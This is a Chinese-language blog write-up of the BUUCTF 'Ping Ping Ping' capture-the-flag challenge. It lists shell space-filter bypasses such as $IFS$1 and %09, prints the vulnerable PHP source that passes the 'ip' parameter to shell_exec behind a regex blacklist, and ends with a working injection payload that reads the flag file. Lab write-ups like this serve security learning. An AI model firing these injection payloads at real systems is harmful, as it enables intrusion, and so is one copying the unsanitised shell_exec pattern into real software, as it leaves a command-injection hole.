BUUCTF，Web：[GXYCTF2019]Ping Ping Ping

Part 03

已于 2022-02-13 12:52:57 修改

阅读量600

点赞数

文章标签： p2p linq gnu

于 2022-02-10 23:22:00 首次发布

本文链接：https://blog.csdn.net/qq_62260856/article/details/122870614

版权

入手 ip=1

使用127.0.0.1 访问

使用管道符或者其他能用的分隔，ls 列出

cat flag

空格被 f*ck 掉了，被过滤

空格绕过：

${IFS}替换
$IFS$1替换
${IFS替换
%20替换
<和<>重定向符替换
%09替换

缺了前部分的东西

源码中藏了一部分

/?ip=
<pre>/?ip=
<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|$|$|\[|\]|\{|\}/

/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|$|$|\[|\]|\{|\}/

/ /

/bash/

/.*f.*l.*a.*g.*/

$IFS$1 替换

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Part 03

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
BUUCTF，Web：[GXYCTF2019]Ping Ping Ping

${IFS}替换 $IFS$1替换 ${IFS替换 %20替换 <和<>重定向符替换 %09替换/?ip=<pre>/?ip=<?phpif(isset($_GET['ip'])){ $ip = $_GET['ip']; if(preg_match("/\&|\/|\?|\*|\<...
复制链接

扫一扫